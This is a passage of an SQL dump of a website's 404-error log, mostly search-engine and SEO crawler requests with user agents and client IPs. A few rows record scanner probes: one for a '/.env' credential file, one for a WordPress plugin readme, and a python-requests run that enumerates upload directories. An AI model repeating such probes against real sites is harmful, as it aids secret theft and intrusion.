Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37919,'2023-01-30 05:15:30','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37920,'2023-01-30 05:15:35','/wx91poqf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37921,'2023-01-30 05:17:56','/dishonoring14/ai7yfe7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37922,'2023-01-30 05:18:43','/advice/dim-ZGltbW/433overc','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37923,'2023-01-30 05:30:22','/sportsmen/9r2gq9qe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37924,'2023-01-30 05:54:55','/alterably/ai0bwnze2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37925,'2023-01-30 05:55:02','/answers/cHJpbnrzag9w-97','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37926,'2023-01-30 06:01:13','/articles/our-ingredients/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.38'),(37927,'2023-01-30 06:15:23','/noctiferous/1u5nsjkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37928,'2023-01-30 06:16:37','/dtjibo1h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37929,'2023-01-30 06:18:02','/w56km11e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37930,'2023-01-30 06:26:23','/a21f6mdf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37931,'2023-01-30 06:29:52','/css/all.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.188'),(37932,'2023-01-30 06:29:52','/css/print.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.173'),(37933,'2023-01-30 06:29:53','/js/fancybox/jquery.mousewheel-3.0.4.pack.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.190'),(37934,'2023-01-30 06:29:53','/js/fancybox/jquery.fancybox-1.3.4.pack.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.149.54'),(37935,'2023-01-30 06:29:54','/js/jquery.browser.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.149.50'),(37936,'2023-01-30 06:29:55','/js/jquery.tooltip.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.33'),(37937,'2023-01-30 06:29:58','/js/all.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.206'),(37938,'2023-01-30 06:29:59','/css/fancybox.css','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.193'),(37939,'2023-01-30 06:29:59','/ajax/libs/jquery/1.9.1/jquery.min.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.66'),(37940,'2023-01-30 06:30:00','/js/jquery.main.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.122'),(37941,'2023-01-30 06:37:57','/wp-content/plugins/booking-calendar/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',NULL,404,'GET',NULL,'185.196.220.26'),(37942,'2023-01-30 06:42:03','/exarch/iwmenowg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37943,'2023-01-30 06:45:03','/naughty/tsbrqo7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37944,'2023-01-30 06:45:45','/retexture/i4qemq2e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37945,'2023-01-30 06:49:12','/venality/9rexiure2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37946,'2023-01-30 06:53:45','/advice/macroc10','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37947,'2023-01-30 07:12:03','/glasswort/k0vizsoe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37948,'2023-01-30 07:18:51','/digging/tjbr3mzg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37949,'2023-01-30 07:27:59','/w7n79z4e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37950,'2023-01-30 07:42:55','/northumberland4/au4dj0dg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37951,'2023-01-30 07:51:38','/offers-and-competitions/bio-bundle/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.131'),(37952,'2023-01-30 07:51:42','/offers-and-competitions/bob-box-competition/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.131'),(37953,'2023-01-30 07:51:45','/optical-brighteners','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.131'),(37954,'2023-01-30 07:51:49','/optical-brighteners/feed','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.131'),(37955,'2023-01-30 07:51:52','/our-ecological-factory/feed','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.131'),(37956,'2023-01-30 07:59:49','/leucorrhoea/t6lfiyhe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37957,'2023-01-30 08:00:49','/emboil4/iec153gg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37958,'2023-01-30 08:07:37','/glamour_models/wp-content/uploads/2011/07/adcjz203.jpg','https://www.dailyjolly.co.uk','Googlebot-Image/1.0',NULL,404,'GET',NULL,'66.249.65.127'),(37959,'2023-01-30 08:17:30','/wp9o7j7e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37960,'2023-01-30 08:29:19','/contendent/trne7zcf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37961,'2023-01-30 08:29:51','/wfvyehee2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37962,'2023-01-30 08:36:06','/friends/wateraid/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.75'),(37963,'2023-01-30 08:54:53','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37964,'2023-01-30 08:59:19','/ignipotent/1poznxkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37965,'2023-01-30 09:14:27','/.env','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0',NULL,404,'GET',NULL,'4.236.144.116'),(37966,'2023-01-30 09:28:09','/twdhpvje2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37967,'2023-01-30 09:32:30','/ak3g6x1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37968,'2023-01-30 09:58:09','/1lnlof3e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37969,'2023-01-30 09:59:13','/knowledge-c2vtaXF1YXJ0aWxl7.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37970,'2023-01-30 09:59:40','/news-mitua?au=eta&m=6co','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37971,'2023-01-30 10:21:44','/planned4/dozaspcg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37972,'2023-01-30 10:25:56','/9f9ahsde2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37973,'2023-01-30 10:32:09','/articles/sensitive-skin/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)',NULL,404,'GET',NULL,'54.36.148.92'),(37974,'2023-01-30 11:01:07','/pinefinch/i8yh5ikd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37975,'2023-01-30 11:04:38','/spearfish/9iknal3h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37976,'2023-01-30 11:18:11','/9ork9sjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37977,'2023-01-30 11:35:42','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:72.0) Gecko/20100101 Firefox/72.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37978,'2023-01-30 11:39:15','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 10; Z832 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Mobile Safari/537.36','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37979,'2023-01-30 11:48:47','/auuh8t7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37980,'2023-01-30 11:55:27','/battlefront/1hdswf0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37981,'2023-01-30 12:08:00','/errand/d9aozquf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37982,'2023-01-30 12:16:56','/keu74bme2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37983,'2023-01-30 12:28:25','/as57cn3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37984,'2023-01-30 12:32:06','/calk/9o0ikf0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37985,'2023-01-30 12:44:27','/cleanse46/9f7y0hug2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37986,'2023-01-30 12:55:18','/attained1/i45em98e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37987,'2023-01-30 13:00:49','/asfdleve2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37988,'2023-01-30 13:03:28','/kcbk1ieg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37989,'2023-01-30 13:29:12','/9r26g4oe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37990,'2023-01-30 13:34:32','/tjnisnve2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37991,'2023-01-30 13:34:54','/9omayp6e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37992,'2023-01-30 13:45:16','/shimmered/wx8br16h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37993,'2023-01-30 13:49:36','/92v2gf8f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37994,'2023-01-30 13:54:29','/ads.txt','https://www.dailyjolly.co.uk','AdsTxtCrawler/1.0.2',NULL,404,'GET',NULL,'3.219.233.103'),(37995,'2023-01-30 14:03:46','/rhizophagous/de7yejbf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37996,'2023-01-30 14:16:16','/shredcook/kcfh8ejd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37997,'2023-01-30 14:18:35','/wp-content/plugins/html404/index.html','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(37998,'2023-01-30 14:20:11','/images/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(37999,'2023-01-30 14:20:12','/uploads/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(38000,'2023-01-30 14:20:13','/img/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(38001,'2023-01-30 14:20:13','/upload/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(38002,'2023-01-30 14:20:14','/gallery/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(38003,'2023-01-30 14:20:14','/files/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(38004,'2023-01-30 14:20:15','/pdf/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(38005,'2023-01-30 14:20:15','/docs/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'51.77.78.41'),(38006,'2023-01-30 14:27:17','/kwssrkpf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(38007,'2023-01-30 14:30:39','/prosy/d24d904e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(38008,'2023-01-30 14:32:49','/platoon3/wzy9jbhf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(38009,'2023-01-30 14:37:32','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38010,'2023-01-30 14:45:30','/document/lev-bGV2aX/253chang','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(38011,'2023-01-30 15:07:38','/ads.txt','https://www.dailyjolly.co.uk','Google-adstxt',NULL,404,'GET',NULL,'66.249.66.209'),(38012,'2023-01-30 15:17:04','/delighted/tfmtvvhf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(38013,'2023-01-30 15:17:34','/lamarckian/1ps0rxkg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(38014,'2023-01-30 15:26:54','/aokbvz7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(38015,'2023-01-30 15:33:54','/t2wkps1f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(38016,'2023-01-30 15:55:28','/i2s1btaf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(38017,'2023-01-30 15:58:17','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/102.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(38018,'2023-01-30 16:04:57','/i2aghc5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(38019,'2023-01-30 16:23:55','/dsoptipf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(38020,'2023-01-30 16:37:42','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.66.15'),(38021,'2023-01-30 16:45:21','/wbsnexkg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(38022,'2023-01-30 17:19:16','/faq-husbandman/?n=revr','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(38023,'2023-01-30 17:26:56','/aej2igye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(38024,'2023-01-30 17:31:14','/paleotype/tekhkj1e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(38025,'2023-01-30 